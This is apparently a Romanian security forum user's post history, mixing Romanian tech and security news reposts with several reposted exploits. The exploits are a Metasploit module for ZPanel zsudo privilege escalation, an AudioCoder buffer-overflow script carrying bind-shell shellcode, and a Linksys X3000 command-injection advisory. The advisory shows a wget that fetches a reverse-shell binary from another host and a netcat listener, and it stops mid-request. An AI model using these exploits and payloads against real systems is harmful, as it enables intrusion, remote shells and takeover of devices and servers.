Jump to content

Matt

Active Members
 View Profile  See their activity

  • Posts

    1773

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by Matt

  1. Matt
    Author : metasploit Source : ZPanel zsudo Local Privilege Escalation Exploit Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/exploit/exe' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => 'ZPanel zsudo Local Privilege Escalation Exploit', 'Description' => %q{ This module abuses the zsudo binary, installed with zpanel, to escalate privileges. In order to work, a session with access to zsudo on the sudoers configuration is needed. This module is useful for post exploitation of ZPanel vulnerabilities, where typically web server privileges are acquired, and this user is allowed to execute zsudo on the sudoers file. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', 'juan vazquez' ], 'DisclosureDate' => 'Jun 07 2013', 'Platform' => [ 'unix', 'linux'], 'Arch' => [ ARCH_CMD, ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Command payload', { 'Arch' => ARCH_CMD } ], [ 'Linux x86', { 'Arch' => ARCH_X86 } ] ], 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, 'DefaultTarget' => 0, } )) register_options([ # These are not OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]), ], self.class) end def check if file?(datastore["zsudo"]) return CheckCode::Detected end return CheckCode::Unknown end def exploit if (target.arch.include? ARCH_CMD) exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh" # Using this way of writing the payload to avoid issues when failing to find # a command on the victim for writing binary data cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}" else exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf" write_file(exe_file, generate_payload_exe) end cmd_exec "chmod +x #{exe_file}" print_status("Running...") begin cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}" ensure cmd_exec "rm -f #{exe_file}" end end end
  2. Matt
    Author : Onying Source : AudioCoder 0.8.22 (.lst) - Direct Retn Buffer Overflow Vulenrable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/a3b972bf42615e5c34edb19b62eb3fc4-AudioCoder-0.8.22.5506.exe Code : # !/usr/bin/python # Title: AudioCoder 0.8.22 [.lst] - Direct Retn Buffer OverFlow # version: 0.8.22 build 5506 (built on May 27 2013, 00:22:49) # link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe # Platform: Windows XP sp3 # Date: June 23th, 2013 # Author: onying (@onyiing) # Blog : http://itsecuritynewbie.blogspot.com/ # Thanks to: Information Security Shinobi Camp | http://www.is2c-dojo.com header = "http://" junk = "\x41" * 249 junk+= "\x53\x93\x42\x7E" junk+= "\x90" * 16 #win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNai junk+=("\xb8\xe2\x59\x26\xe6\x33\xc9\xda\xdd\xb1\x51\xd9\x74\x24\xf4\x5e" "\x31\x46\x10\x83\xc6\x04\x03\xa4\x55\xc4\x13\xd4\x0c\xe3\x91\xcc" "\x28\x0c\xd6\xf3\xab\x78\x45\x2f\x08\xf4\xd3\x13\xdb\x76\xd9\x13" "\xda\x69\x6a\xac\xc4\xfe\x32\x12\xf4\xeb\x84\xd9\xc2\x60\x17\x33" "\x1b\xb7\x81\x67\xd8\xf7\xc6\x70\x20\x3d\x2b\x7f\x60\x29\xc0\x44" "\x30\x8a\x01\xcf\x5d\x59\x0e\x0b\x9f\xb5\xd7\xd8\x93\x02\x93\x81" "\xb7\x95\x48\x3e\xe4\x1e\x07\x2c\xd0\x3c\x79\x6f\x29\xe6\x1d\xe4" "\x09\x28\x55\xba\x81\xc3\x19\x26\x37\x58\x99\x5e\x19\x37\x94\x10" "\xab\x2b\xf8\x53\x65\xd5\xaa\xcd\xe2\x29\x7f\x79\x84\x3e\x4d\x26" "\x3e\x3e\x61\xb0\x75\x2d\x7e\x7b\xda\x51\xa9\x24\x53\x48\x30\x5b" "\x8e\x9b\xbf\x0e\x3b\x9e\x40\x60\xd3\x47\xb7\x75\x89\x2f\x37\xa3" "\x81\x9c\x94\x18\x75\x60\x48\xdd\x2a\x99\xbe\x87\xa4\x74\x63\x21" "\x66\xfe\x7a\x38\xe0\xa4\x67\x32\x36\xf3\x68\x64\xd2\xec\xc7\xdd" "\xdc\xdd\x80\x79\x8f\xf0\xb9\xd6\x2f\xda\x69\x8d\x30\x33\xe5\xc8" "\x86\x32\xbf\x45\xe6\xed\x10\x3d\x4c\x47\x6e\x6d\xff\x0f\x77\xf4" "\xc6\xa9\x20\xf9\x11\x1c\x30\xd5\xf8\xf5\xaa\xb3\x6c\x69\x5e\xb2" "\x88\x07\xf0\x9d\x7b\x14\x79\xfa\x16\xe0\xf3\xe6\xd6\x28\xf0\x4c" "\xe6\xeb\xda\x6e\x55\xc0\xb7\x03\x20\x20\x13\xb0\x7e\x38\x11\x38" "\x33\xaf\x2a\xb1\x70\x2f\x02\x62\x2e\x9d\xfa\xc5\x81\x4b\xfc\xb4" "\x70\xd9\xaf\xc9\xa3\x89\xe2\xec\x41\x84\xae\xf1\x9c\x72\xae\xf2" "\x16\x7c\x80\x87\x0e\x7e\xa2\x53\xd4\x81\x73\x09\xea\xae\x14\xd3" "\xcc\xad\x96\x78\x12\xe7\xa6\xae") file = open("audiocoder.lst" , "w") file.write(header+junk) file.close()
  3. Matt
    China a acuzat joi Statele Unite de "standarde duble" si ipocrizie in domeniul securitatii cibernetice in contextul amplificarii tensiunilor intre Beijing si Washington in legatura cu zborul fostului informatician american acuzat de spionaj de Washington, Edward Snowden. Aceasta noua reactie a Chinei survine la doua zile dupa ce Beijingul a respins acuzatiile SUA potrivit carora l-ar fi ajutat pe Snowden, acuzat de spionaj in SUA, sa scape de inculpare permitandu-i sa paraseasca Hong Kong-ul, relateaza Reuters. Securitatea cibernetica este o tema sensibila in relatia dintre China si SUA si a fost unul din principalele subiecte pe agenda primului summit intre presedintii Xi Jinping si Barack Obama din aceasta luna. Dezvaluirile lui Snowden privind intruziunea Agentiei Nationale de Securitate a SUA in China si Hong Kong au oferit Beijingului munitie considerabila in schimbul de tipul "ochi pentru ochi si dinte pentru dintre" dintre cele doua tari, noteaza Reuters. Ministerul Apararii din China a spus ca programul PRISM "a dezvaluit adevarata fata si comportamentul ipocrit ale tarii vizate", fara a preciza numele tarii. Documentele sustrase de Snowden au aratat ca Agentia Nationala de Securitate are acces la numeroase date online precum e-mail-uri, chat-room-uri si inregistrari video de la companii mari, inclusiv Facebook si Google, in cadrul programului guvernamental cunoscut sub denumirea de PRISM. "Pe de o parte, cauta avantajele folosirii incorecte si egoiste a tehnologiei informatiilor si, pe de alta parte, face acuzatii fara acoperire impotriva altor tari", a declarat presei purtatorul de cuvant al Ministerului chinez al Apararii, Yang Yujun, potrivit agentiei nationale de presa Xinhua. "Aceasta abordare a 'standardelor duble' nu este favorabila pacii si securitatii in spatiul cibernetic", a spus el. China a precizat ca este profund ingrijorata de afirmatiile lui Snowden potrivit carora Statele Unite au patruns ilegal in numeroase retele de internet din Hong Kong si China, inclusiv cea a Universitatii Tsinghua, care gazduieste unul din principalele centre de internet din tara, si in retele chineze de telefonie mobila. Beijingul a spus ca a discutat aceasta chestiune cu Washingtonul. Snowden a cerut azil in Ecuador, in prezent considerandu-se a fi in tranzit pe un aeroport din Moscova, de cand a zburat duminica din Hong Kong. Sursa Business24.Ro
  4. Matt
    Autoritatile americane si cele europene, inclusiv cele din Romania, au anuntat miercuri inchiderea, in cadrul unei operatiuni mixte, a 328 de site-uri de shopping online ce aveau la vanzare produse contrafacute citand un comunicat comun. De partea americana, agentii serviciului vamal si ai securitatii interne n.r. Homeland) au pozat in simpli cumparatori si au identificat nu mai putin de 177 de site-uri care vindeau produse contrafacute a noua marci, printre care producatorul de echipamente sportive Nike, bijutierul Tiffany sau liga de baschet americana (NBA), relateaza AFP. Sub bannerul Europol, autoritatile franceze, britanice, belgiene si romane au procedat la inchiderea a 151 de site-uri ce utilizau in mod fraudulos nume de domenii precum .eu sau .fr, potrivit comunicatului. Anchetatorii au confiscat peste 150.000 de dolari proveniti din vanzari Peste 150.000 de dolari proveniti din vanzarea acestor produse, efectuate prin sistemul de plata online PayPal, au fost de asemenea confiscati de anchetatori, conform aceleiasi surse. "Aceste parteneriate (n.r. intre SUA si Europa) sunt vitale pentru a-i prinde pe raufacatorii care pacalesc, peste tot pe Glob, consumatori care nu banuiesc nimic", a explicat Mark Witzal, directorul adjunct al Centrului de protectie a proprietatii intelectuale (IPR) de la Washington, care a coordonat operatiunea. Produsele contrafacute "aduc atingeri" companiilor legale si prezinta "adesea" riscuri in termeni de sanatate si siguranta pentru consumatori, a adaugat Rob Wainwright, la randul sau citat in comunicat. Sursa Business24.Ro
  5. Matt
    Regina Marii Britanii, Elisabeta a II-a, a acordat in cadrul unei receptii la Palatul Buckingham un premiu in domeniul stiintei si tehnologiei, in valoare de un milion de lire sterline. Premiul, care poarta numele reginei Queen Elizabeth Prize for Engineering, se acorda autorilor inovatiilor in domeniul ingineriei, care au avut un impact semnificativ asupra progresului omenirii, relateaza portalul Allvoices.com. De data aceasta, premiul a fost decernat unui grup de persoane direct implicate in dezvoltarea Internetului: englezul Tim Berners-Lee, francezul Louis Pouzin, americanii Robert Kahn, Vinton Cerf si Marc Andreessen. Tim Berners-Lee a dezvoltat pentru prima data conceptul de World Wide Web. Vinton Cerf si Robert Kahn au creat protocolul TCP/IP, care si astazi se afla la baza de transmitere a informatiilor prin intermediul internetului. Louis Pouzin a dezvoltat un sistem de marcare a datelor, iar Andreessen - primul browser din lume. Internetul, utilizat de o treime din populatia lumii Utilizarea in scopuri comerciale a Internetului a inceput in 1995, cand acest concept a fuzionat de fapt cu conceptul de World Wide Web. Inainte reteaua era sustinuta de US National Science Foundation, iar din 1995 aceasta functie a fost pe deplin transferata catre furnizorii de retele independente. Aproximativ 2,4 miliarde de oameni, adica mai mult de o treime din populatia lumii utilizeaza Internetul, potrivit datelor din 2012. La ceremonia de la Palatul Buckingham, desfasurata marti, au participat prim-ministrul britanic David Cameron, vicepremierul Nick Clegg, si liderul opozitiei unite si presedinte al Partidului Laburist, Ed Miliband. Sursa Business24.Ro
  6. Matt
    In Coreea de Sud s-a lansat ceea ce a fost numit cel mai rapid Internet din lume in retelele 4G/LTE, cu cele mai mari viteze de descarcare a datelor. Potrivit SK Telecom, reteaua LTE permite dscarcarea unor fisiere la viteze de pana la 150 de megabiti pe secunda, ceea ce inseamna de doua ori mai rapid decat inainte si de 10 ori mai rapid decat viteza serviciilor 3G, informeaza BBC. Utilizatorii vor avea parte, practic, de viteze mai mici decat 150 de megabiti pe secunda, insa un grup de internauti care vor vrea sa comunice intre ei prin videochat vor beneficia de calitate video si audio mai mare decat oricand inainte. Sursa Business24.Ro
  7. Matt
  8. Matt
    Gata , lasati off-topicul.Urati-i doar bun venit.
  9. Matt
    Mai nou metinar = programator.
  10. Matt
    Potrivit rezultatelor studiului “Evolutia atacurilor de tip phishing in perioada 2011-2013”, realizat de Kaspersky Lab, numarul de utilizatori de internet care s-au confruntat cu atacuri de tip phishing in ultimele 12 luni a crescut de la 19,9 milioane la 37,3 milioane, inregistrand o crestere de 87%. Facebook, Yahoo, Google si Amazon se numara printre principalele tinte atacate de infractorii cibernetici. Studiul, realizat in luna iunie 2013, folosind datele colectate de serviciul cloud Kaspersky Security Network, demonstreaza ca ceea ce reprezenta inainte un subcategorie al spam-ului a evoluat acum intr-o amenintare cibernetica de sine statatoare. Phishing-ul reprezinta o forma de frauda pe internet, prin care infractorii creeaza copii false ale site-urilor populare (un serviciu de e-mail, un website de online banking, o retea de socializare etc.), unde incearca sa ii atraga pe utilizatori. Acestia, increzatori fiind, introduc datele de inregistrare si parolele pe aceste website-uri, cum ar face-o in mod obisnuit, insa informatiile ajung la infractorii cibernetici. Ei pot folosi apoi informatiile personale furate, datele conturilor bancare sau parolele pentru a fura banii utilizatorilor, pentru a trimite mesaje de tip spam si fisiere malware prin intermediul contului de e-mail compromis sau al retelei de socializare, sau pot, pur si simplu, sa vanda datele furate si parolele altor infractori. Pentru o perioada lunga de timp, phishing-ul a fost privit ca o subspecie a e-mail-urilor obisnuite de tip spam. Insa, datele colectate in timpul cercetarii confirma faptul ca atacurile de tip phishing au ajuns la un nivel atat de avansat, incat pot fi considerate o categorie separata de sine statatoare. De fapt, e-mailul nu mai reprezinta cel mai des intalnit mecanism pentru mesajele de tip spam. De exemplu, numai 12% din atacurile de phishing inregistrate au fost lansate prin intermediul e-mail-urilor de tip spam. Restul de 88% au provenit din link-uri catre paginile de phishing pe care utilizatorii au ajuns in timp ce foloseau un motor de cautare, un sistem de mesagerie (Skype etc.) sau in urma utilizarii obisnuite a computerului. In timpul derularii studiului, specialistii Kaspersky Lab au comparat informatii despre atacurile de phishing colectate de Kaspersky Security Network de la peste 50 de milioane de utilizatori, in perioada 1 mai 2012 si 30 aprilie 2013, datele fiind relevante pentru perioada 2011-2012. Principalele descoperiri Utilizatori In perioada 2012-2013, phisher-ii au lansat atacuri care au afectat, in medie, 102,100 de persoane la nivel mondial zilnic – de doua ori mai multe decat in perioada 2011-2012; Atacurile de tip phishing tintesc cel mai adesea utilizatori din Rusia, SUA, India, Vietnam si Anglia; Vietnam, SUA, India si Germania au cel mai mare numar de utilizatori afectati – numarul total de atacuri din aceste regiuni fiind dublu comparativ cu anul trecut. Atacatori Majoritatea serverelor care gazduiesc pagini de phishing sunt inregistrate in SUA, Anglia, Germania, Rusia si India; Numarul de surse unice de atac – cum ar fi site-urile si serverele frauduloase – s-a triplat in perioada 2012-2013; Peste jumatate (56%) dintre sursele de atac identificate s-au regasit pe teritoriile a numai 10 tari, ceea ce demonstreaza faptul ca atacatorii dispun de un set de „baze” preferate de unde isi lanseaza atacurile. Tinte Serviciile companiilor Yahoo!, Google, Facebook si Amazon sunt cele mai frecvent atacate de phisheri – 30% din totalul incidentelor inregistrate implica versiuni falsificate ale acestor website-uri; Peste 20% din toate atacurile de tip phishing imita site-urile bancilor sau ale altor organizatii financiare; American Express, PayPal, Xbox live, Twitter s.a. se afla in tipul celor mai atacate 30 de website-uri. “Volumul si varietatea atacurilor de tip phishing detectate in timpul studiului indica faptul ca phishing-ul nu mai reprezinta un simplu instrument din categoria de trucuri ilegale dezvoltate de infractori, ci constituie, in mod vizibil, o amenintare serioasa”, a declarat Nikita Shvetsov, Deputy CTO (Research) in cadrul Kaspersky Lab. „Aceste atacuri sunt relativ simplu de organizat si isi dovedesc eficienta, tot mai multi infractori cibernetici fiind atrasi de acest tip de activitate ilegala. Volumul de atacuri de tip phishing, care, potrivit Kaspersky Security Network, aproape s-a dublat pe parcursul unui an, reprezinta o dovada a acestei tendinte”, a incheiat Nikita Shvetsov. Sursa FaraVirusi.Com
  11. Matt
    Bitdefender, produc?torul celei mai performante solu?ii antivirus din lume, lanseaz? noua genera?ie de produse, o gam? ce se adapteaz? perfect caracteristicilor fiec?rui computer în parte, pentru vitez? de top ?i protec?ie de fier a datelor personale. Noul Bitdefender vine cu noi func?ii inovatoare cum ar fi tehnologia unic? Photon – pentru o experien?? personalizat? ?i scanare extrem de rapid? ?i func?ia Wallet – pentru p?strarea în deplin? siguran?? a parolelor ?i a detaliilor de autentificare. De asemenea, noua gam? extinde ?i dezvolt? func?iile care au permis Bitdefender s? câ?tige titlul de Produsul anului de la AV-Comparatives, precum ?i toate celelalte premii din industrie pe parcursul anului trecut. ’’Agresivitatea atacurilor informatice, cre?terea exploziv? a utiliz?rii internetului ?i tehnologiile avansate utilizate de criminalii informatici sporesc importan?a securit??ii pe internet, a?a c? a fost imperativ? crearea unui produs mai bun ca oricând. Ne-am propus s? concepem o solu?ie capabil? s? se adapteze perfect fiec?rui sistem în parte, pentru eficien?? maxim? ?i protec?ie discret?, oferind în acela?i timp func?ii inovatoare ?i tehnologii îmbun?t??ite pentru tranzac?ii bancare sigure, protec?ie de top a informa?iilor personale ?i a datelor de autentificare ?i cel mai rapid r?spuns la cele mai agresive amenin??ri informatice’’, declar? C?t?lin Co?oi, Chief Security Strategist, Bitdefender. Tehnologia inovatoare Bitdefender Photon™, pe care o înglobeaz? noul Bitdefender, descoper? gradual aplica?iile software instalate în computer, mulându-se pe fiecare configura?ie de PC ?i memoreaz? procesele ce trebuie sau nu monitorizate. Rezultatul se traduce într-un num?r mai mic de fi?iere sub control constant ?i mai pu?ine resurse de sistem consumate pentru a-l men?ine în deplin? siguran??. O alt? func?ie nou? ?i extrem de util? este aceea de Wallet, ce p?streaz? datele cruciale în spatele unui scut protector impenetrabil ?i asigur? utilizatorului, în acela?i timp, un acces facil. În contextul în care în ultimii 10 ani num?rul de terminale conectate la internet a înregistrat o cre?tere exploziv?, pu?ine lucruri s-au schimbat în ceea ce prive?te modul de autentificare pe internet. Folosirea repetat? a acelora?i parole, dar ?i parolele slabe par a fi principalul motiv pentru scurgerile de informa?ii importante. Func?ia Wallet a noului Bitdefender elibereaz? practic utilizatorul de povara memor?rii unui num?r foarte mare de parole ?i le men?ine în siguran??. Noul Bitdefender, conceput pentru era pericolelor crescute pe internet, include tehnologia Bitdefender Antispam, ce opereaz? din cloud cu o acurate?e fenomenal? ?i ?ine la distan?? mesajele nesolicitate ?i poten?ial periculoase. Bitdefender Safepay™, ce protejeaz? tranzac?iile online din toat? lumea de la lansarea sa cu un an în urm?, p?streaz? informa?iile sensibile referitoare la tranzac?ii în siguran?? ?i în acela?i timp la îndemân? prin intermediul func?ie Wallet. De asemenea, un raport de securitate complet nou garanteaz? protec?ia utilizatorilor, ghidându-i spre m?suri de securitate sporit? prin recomand?ri ?i notific?ri personalizate. “Dup? succesul fenomenal ob?inut de Bitdefender în ultimii doi ani, suntem con?tien?i c? exper?ii ?i publicul se a?teapt? s? ne p?str?m leadership-ul la nivelul industriei în ceea ce prive?te performan?a. Am încredere c? noua noastr? genera?ie de produse va men?ine acest leadership ?i va face fa?? cu success provoc?rilor,” spune C?t?lin Co?oi, Chief Security Strategist, Bitdefender. Noua gam? aduce versiuni îmbun?t??ite ale tuturor func?iilor care au propulsat Bitdefender în fruntea industriei de securitate în ultimii doi ani. Modulul Autopilot permite utilizatorilor s? se joace sau s? vad? filme f?r? întreruperi, protec?ia datelor personale pe Facebook fere?te utilizatorii de bre?e de securitate ?i link-uri periculoase, modulul Anti-Theft permite blocarea, ?tergerea sau g?sirea unui dispozitiv mobil, iar cel de Control Parental acoper? acum toate mediile Windows – inclusiv Windows 8 ?i RT. Noul Bitdefender va fi disponibil online pe Antivirus Software - Bitdefender Romania. Sursa FaraVirusi.Com
  12. Matt

    Blog HackingTuts93

    Matt replied to Wish3r's topic in Linkuri

    Clubul V.I.P va deveni functional astazi. Pentru a achizitiona acces in zona V.I.P va trebui sa faceti o donatie de minim 3 euro pentru a avea 1 luna acces in zona V.I.P . This is shit.
  13. Matt
    G Data avertizeaza impotriva sustragerilor online si ofera sfaturi pentru o calatorie sigura Din ce in ce mai multi turisti isi iau in bagaje, telefoanele smart, tabletele si laptop-urile, atunci cand pleaca in vacanta, ceea ce inseamna ca pot trimite felicitari, pot face poze ori pot ramane conectati la noutatile cotidiene prin intermediul Internetului. Ce nu stiu, este ca protectia inadecvata a acestor dispozitive, ii fac sa devina tinte usoare pentru infractorii cibernetici. G Data ii avertizeaza pe turisti sa nu utilizeze retele WLAN gratuite sau computere manipulate din Internet Cafe-uri. Inainte de a-si stabili coordonatele vacantei, utilizatorii de Internet ar trebui sa isi securizeze dispozitivele si sa tina seama de cateva sfaturi de securitate. G Data ii poate ajuta pe turisti, oferind sfaturi pentru o vacanta relaxanta si sigura – fara surprize neplacute. "In perioada de vacanta infractorii cibernetici profita de pe urma faptului ca utilizatorii, nedespartiti de dispozitivele mobile, folosesc Internet Cafe-urile publice pentru a se co-necta la Internet," avertizeaza Eddy Willems, G Data Security Evangelist. "Atacatorii exploateaza retelele WLAN insuficient securizate sau manipuleaza computerele din Internet Cafe-uri, asa ca pot citi tot traficul de date si pot spiona informatiile de pe cartile de credit, parolele si datele personale." Expertii in securitate IT le recomanda turistilor sa-si securizeze telefoanele, tabletele si laptop-urile inainte de a pleca in vacanta si sa manifeste prudenta cat sunt departe de casa – pentru ca vacanta distractiva 2.0 sa nu se transforme in frustrare. "Inainte de ple-carea in vacanta, utilizatorii ar trebui sa-si revizuiasca securitatea dispozitivelor mobile si sa-si instaleze toate update-urile disponibile. Utilizarea unei solutii de securitate eficienta este o necesitate." Mai mult decat atat, Willems ii sfatuieste pe utilizatori sa-si ia masuri de precautie in caz de furt sau pierdere: "O multime de date confidentiale sunt stocate, de regula, pe dispo-zitivele mobile, provocand mari neplaceri in cazul in care dispozitivul ajunge pe maini gresite. Utilizatorii ar putea sa-si echipeze dispozitivele cu protectie antifurt ce permite blocarea de la distanta sau stergerea tuturor datelor stocate.” Noua sfaturi pentru o vacanta sigura Inainte de plecare: Instalarea unei aplicatii de securitate: Turistii sunt sfatuiti sa-si instaleze o so-lutie de securitate eficienta. Aplicatiile software - permanent actualizate: Inainte de plecarea in vacanta, sistemul de operare si programele ar trebuie sa fie complet actualizate. Aceasta ii ajuta pe utilizatori sa inchida bresele de securitate ce ar putea fi exploatate de atacatori. Activati protectia antifurt: Utilizatorii ar trebui sa-si asigure dispozitivele in caz de pierdere, prin instalarea unei solutii de securitate care include si protectia antifurt. Aceasta permite ca dispozitivul sa fie localizat si blocat de la distanta, iar datele stocate pot fi sterse. Pe laptop-uri, datele importante de pe hard-disk ar trebui sa fie criptate, pentru a nu lasa nicio sansa infractorilor sa le acceseze. Setati un cont de email separat pentru felicitari trimise din vacanta: Cei care vor sa trimita „vederi” electronice catre prieteni sau familie ar trebui sa-si creeze un cont separat de email. In eventualitatea unui atac, doar acesta va fi compromis si va pu-tea fi sters odata cu intoarcerea acasa. Salvati datele: Inainte de plecare, este ideala crearea unei copii a tuturor date-lor aflate pe dispozitive sau pe alte medii de stocare. Notati numarul de blocare: Turistii ar trebui sa-si noteze numarul de service al operatorului de telefonie mobila sau al furnizorilor de carduri. Astfel, cardul, stick-ul de Internet sau dispozitivul mobil poate fi blocat imediat, in cazul pierderii. Pe perioada vacantei: Evitati retelele publice WLAN: Utilizarea retelelor gratuite din aeroporturi, gari sau hoteluri ar trebui evitata pentru ca ofera, adesea, o securitate inadecvata. In locul acestora, turistii pot naviga pe Internet, folosind carduri UMTS oferite de operatorii de telefonie mobila. Atentie la Internet Cafe-uri: Computerele publice sunt, in general, insuficient securizate, asa ca turistii ar trebui sa evite tranzactiile de online banking si sesiunile de cumparaturi de pe Internet si sa nu-si descarce sau salveze niciun fel de date personale. In caz contrar, infractorii pot exploata aceste date si le pot folosi pentru a trimite propu-neri ilegale. Nu le oferiti sanse „hotilor de buzunare”: Evitati imprumutarea sau nesuprave-gherea personala a dispozitivelor mobile. Utilizatorii ar trebui sa renunte la dispozitivele lor atunci cand merg la piscina hotelului sau pe plaja – hotii de buzunare sunt in cautarea turistilor mai putin suspiciosi. Incuierea acestora in camera de hotel poate fi o varianta, daca folosirea acestora nu este neaparat necesara. Despre G DATA Software AG G Data Software AG, cu sediul central in Bochum, este o companie cu o expansiune software inovativa si rapida care se concentreaza pe solutiile de securitate IT. Drept specialist in securitate pe Internet si pionier in domeniul protectiei antivirus, compania fondata in 1985 in Bochum, a produs primul program antivirus acum mai bine de 20 de ani si in 2010 si-a aniversat cei 25 de ani de activitate. G Data este printre primele companii dezvoltatoare de software de securitate din lume. De mai mult de cinci ani, nici un alt producator european de software de securitate nu a castigat mai multe premii internationale. Gama de produse cuprinde solutii de securitate atat pentru consumatori casnici, cat si pentru companii mici, medii si mari. Solutiile de securitate G Data sunt disponibile in mai mult de 90 de tari din intreaga lume. Mai multe informatii despre companie si solutiile G Data sunt disponibile pe International - G Data Software AG Despre AV Security Software Distribution AV Security Software Distribution este o companie tanara, infiintata la inceputul anului 2011 pentru a deveni distribuitor oficial G Data Software in Romania, din dorinta unor tineri si ambitiosi profesionisti de a demonstra ca pot sa creasca imaginea unui brand de nivel mondial, pe piata din Romania, la nivelul pe care acesta il are in Germania si in restul lumii. Oferta de parteneriat include solutii software antivirus de inalta calitate si este adresata resellerilor, integratorilor de sistem si retailerilor. Beneficiile oferite de solutiile „Made in Germany“ dezvoltate de G Data sunt: profitabilitate, performanta, pro-ductivitate marita, usurinta in exploatare, cel mai bun raport calitate-pret de pe piata. Mai multe despre companie si distributia solutiilor G Data in Romania gasiti pe site-ul AV Security Software Distribution - Distribuitor autorizat G Data Romania Sursa: AV Security Software Distribution - Distribuitor autorizat G Data Romania
  14. Matt
    Infractorii cibernetici pot acum sa creeze programe troian bazate pe Carberp, pentru a fura date de autentificare online banking si alte date financiare Codul sursa al malware-ului financiar Carberp a fost publicat online, crescand riscul ca infractorii cibernetici sa creeze propriile variante bazate pe acesta, au indicat cercetatorii din cadrul firmei rusesti de investigare a infractionalitatii cibernetice Group-IB. Carberp este un troian utilizat in principal pentru a fura date de autentificare online banking sau alte informatii cu caracter financiar. Malware-ul viza, initial, utilizatorii din statele fostei Uniuni Sovietice, insa infractorii cibernetici din spatele acestuia au extins operatiunile catre alte regiuni, cum ar fi Australia. Saptamana trecuta, un membru al gruparii Carberp s-a oferit sa vanda codul sursa al malware-ului, precum si alte module, pentru suma de 5.000 de dolari. Cercetatorii Group-IB au declarat, la acea vreme, ca vanzarea a fost, probabil, rezultatul unui conflict intern al gruparii. Potrivit cercetatorilor, ca urmare a conflictului, codul sursa al programului, sau cel putin o parte semnificativa a acestuia, a fost publicat online. Luni, un cercetator de securitate georgian, Ucha Gobejishvili, a declarat pe Twitter ca au fost publicate codul sursa al Carberp si modulul bootkit al acestuia - boot rootkit. Gobejishvili a publicat un screen shot al unei postari pe forum care anunta scurgerea codului si care continea un link catre un site file hosting, pe care ar fi fost stocat codul sursa, protejat prin parola. Fisierul a fost mutat din acea locatie, insa cercetatorii Group-IB au confirmat ca publicarea codului este reala. Fisierul arhiva continea codul sursa integral al Carberp si o parte din codul sursa al modulului bootkit, a declarat Andrey Komarov, director de proiecte internationale in cadrul Group-IB, precizand ca se asteapta ca arhiva sa fie impartasita fara parola pe alte forumuri destinate infractionalitatii cibernetice in urmatoarele zile. Aceasta va conduce, cel mai probabil, la dezvoltarea a noi variante ale programelor Carberp si a troienilor bazati pe Carberp in viitor, astfel cum s-a intamplat si in cazul malware-ului financiar Zeus. Codul sursa pentru Zeus, unul dintre cele mai populare programe troian online banking pana in prezent, a fost publicat in luna aprilie 2011, la cateva saptamani dupa ce a fost pus in vanzare pe piata subterana. Astfel, instrumentul a fost pus la dispozitia oricui in mod gratuit si a permis dezvoltarea programelor troian bazate pe Zeus, cum ar fi GameOver si Ice IX. Sursa: Computerworld - IT news, features, blogs, tech reviews, career advice
  15. Matt

    Fun stuff

    Matt replied to Wisa's topic in Discutii non-IT

  16. Matt
    Author : m-1-k-3 Source : Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities Code : Device: X3000 Vendor: Linksys ============ Vulnerable Firmware Releases: ============ Firmware Version: v1.0.03 build 001 Jun 11,2012 ============ Vulnerability Overview: ============ * OS Command Injection The vulnerability is caused by missing input validation in the ping_ip parameter and can be exploited to inject and execute arbitrary shell commands. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. * OS Command Injection - Vector 1 (1): => Parameter: ping_ip Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Diagnostics.asp Authorization: Basic XXX= Content-Type: application/x-www-form-urlencoded Content-Length: 194 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip= Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/x3000-os-command-injection.png ============================= To get a shell: * 1st Request submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20wget http://192.168.178.105/mipsbe_reverse_shell.elf -O /tmp/test1%20%3b&ping_size=&ping_times=5&traceroute_ip= => 2nd Request: Requesting change of permissions => 3rd Request: Requesting execution of your payload * Webserver is hosting Big endian MIPS Shellcode: # ls /var/www/ mipsbe_reverse_shell.elf * starting local listener via netcat: # nc -vlp 4444 listening on [any] 4444 ... 192.168.178.188: inverse host lookup failed: Unknown server error : Connection timed out connect to [192.168.178.105] from (UNKNOWN) [192.168.178.188] 44424 <snip> ============================= * OS Command Injection - Vector 1 (2): => Parameter: Add_Account_Password Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.188 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: 